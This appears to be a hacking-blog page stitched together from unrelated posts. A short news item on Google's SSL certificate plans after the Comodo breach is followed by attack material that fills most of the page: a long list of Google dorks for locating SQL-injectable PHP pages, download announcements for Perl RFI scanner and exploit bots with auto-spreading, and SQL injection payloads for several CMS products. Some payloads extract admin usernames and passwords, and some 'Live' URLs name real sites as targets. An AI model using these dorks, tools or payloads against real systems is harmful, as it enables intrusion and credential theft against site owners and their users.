Google Unveils SSL Security Plans

As the security industry attempts to move on from the Comodo security breach, Google is shedding light on its plans for securing secure socket layer (SSL) certificates.

In a posting to the Google Online Security blog, security team engineer Ben Laurie outlined plans for a pair of projects which the company hopes will help to prevent future security incidents and restore user trust in online certificates.

The first project is an online catalogue for certificates. Laurie explained that the company is using its web crawling software to pore over sites and gather information on security certificates.

The company plans to turn the collection into the Google Certificate Catalog, a service which will function as a database of SSL certificates, allowing for connections to verify the authenticity of online certificate data.

In addition to the database, Google said that it would be working with the DNS-based Authentication of Named Entries (DANE) working group. The group is working to build a platform which can specify and validate the signing on online certificates.

“In the wake of the recent Comodo fraud incident, there has been a great deal of speculation about how to improve the public key infrastructure, on which the security of the Internet rests,” Laurie wrote

“Unfortunately, this isn’t a problem that will be fixed overnight.”

Laurie was referring to the recent crisis with security firm Comodo in which a hacker was able to gain access to company data and then use the information to generate fake security certificates.

A hacker from Iran later claimed responsibility for the attacks.

Bug Dork SQL

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:".php?id=1"
inurl:".php?cat=1"
inurl:".php?catid=1"
inurl:".php?num=1"
inurl:".php?bid=1"
inurl:".php?pid=1"
inurl:".php?nid=1"

FeeLCoMz RFI Scanner Bot v5.4

#!/usr/bin/perl
print('
##################################################
## FeeLCoMz RFI Scanner Bot v5.4 (FeeLScaNz.pl) ##
## By FaTaLisTiCz_Fx ##
## © Agu 2008 - Okt 2009, FeeLCoMz Community ##
##################################################
');
######################################################
## Usage: ##
## perl feelscanz.pl ##
## ##
## Notes: ##
## + All Parameters are optional ##
## ##
## Features: ##
## + RFI Scanner ##
## + RFI Scan & Exploit (Exploit per engine) ##
## + Joomla RFI Scan & Exploit ##
## + Milw0rm Search ##
## + Google bypass (Using PHP) ##
## + Message Spy & Save ##
## + Auto Spreading ##
## + MD5 Crack Search ##
######################################################

Download Full Id here

VopCrew Multi Scanner 5.1 Release

############################################
# VopCrew Multi Scanner v5.1 #
# Coded by Vrs-hCk #
# d00r[at]telkom[dot]net #
# Copyleft © 2009 VopCrew UnderGrounD #
############################################
# perl vopcrew.txt help me !!! #
############################################

Download here

CMS WEBjump! SQL Injection

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Powered by Content Management System WEBjump! SQL Injection Vulnerability
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Author : M3NW5
contach : M3NW5@hackermail.com
GreetZ : Anggie Barker,vhiia ^,^
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

–== Dork ==–
Powered by Content Management System WEBjump! “portfolio_genre.php?id=”

Exploite : www.sute.com/portfolio_genre.php?id=-67%20union%20select%201,2,@@version–

Live : http://www.leti.cz/portfolio_genre.php?id=-67%20union%20select%201,2,@@version–

–== Dork ==–
Powered by Content Management System WEBjump! “news_id.php?lang=”

Exploite : www.sute.com/path/news_id.php?lang=en&id=-92%20union%20select%201,2,3,@@version,5–

Live : http://tower.klif.pl/content/news_id.php?lang=en&id=-92%20union%20select%201,2,3,@@version,5–

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2009-03-10]

Source

Giga Nepal SQL Injection Vulnerability

======================================
Author : Gonzhack

Contact : gonzhack@gmail.com

Home : Http://www.indonesiancoder.com

======================================
D0rk : Powered By Giga Nepal
======================================
Bug :

/newsdetail.php?id=[sql]

POC :

-2+union+select+1,concat(username,0x3a,password),3,4,5,6+from+mytbladminlogin–

======================================

Source

Powered by eNdonesia 8.3

____________________________________________________
————————-IndonesiaCoder Team—————————
____________________________________________________

Author : CYB3R_TR0N
Contact : ds1.webdeessaint@yahoo.com
website : www.indonesiancoder.com , www.webdeessaint.com
____________________________________________________

#
Dork :
Powered by eNdonesia 8.3 mod.php?id=

#
Example:

http://www.site.com/mod.php?mod=publisher&op=viewarticle&artid={SQL}

#
Exploit :
-9999+union+select+1,2,3,concat_ws(0×3a,aid,email,pwd),5,6,7,8,9,10,11+from+authors–

____________________________________________________

————————————————————————-
cyb3rtr0n
Indonesian Coder Team
www.webdeessaint.com

————————————————————————-

GreetZ :
—> All IndonesiaCoder Team
—> Agiinda Wardani

————————[ Fifala Indonesian Coder Team ]————————

Source


 

Copyleft © 2011